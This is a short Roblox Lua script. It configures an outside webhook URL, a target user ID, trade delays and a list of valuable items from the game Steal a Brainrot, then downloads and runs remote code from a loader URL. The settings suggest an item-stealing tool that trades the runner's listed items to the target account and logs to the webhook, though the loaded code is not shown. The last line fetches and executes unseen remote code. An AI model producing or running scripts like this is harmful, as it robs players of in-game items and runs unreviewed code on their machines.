getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_c1546434e7224a6ba8268641a769088f"
getgenv().TARGET_ID = 109983668079237
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Chipso and Queso"] = true,
    ["La Spooky Grande"] = true,
    ["La Extinct Grande"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Festive 67"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Los Spaghettis"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Los Bros"] = true,
    ["Los Primos"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["La Grande Combinasion"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Jolly Jolly Sahur"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()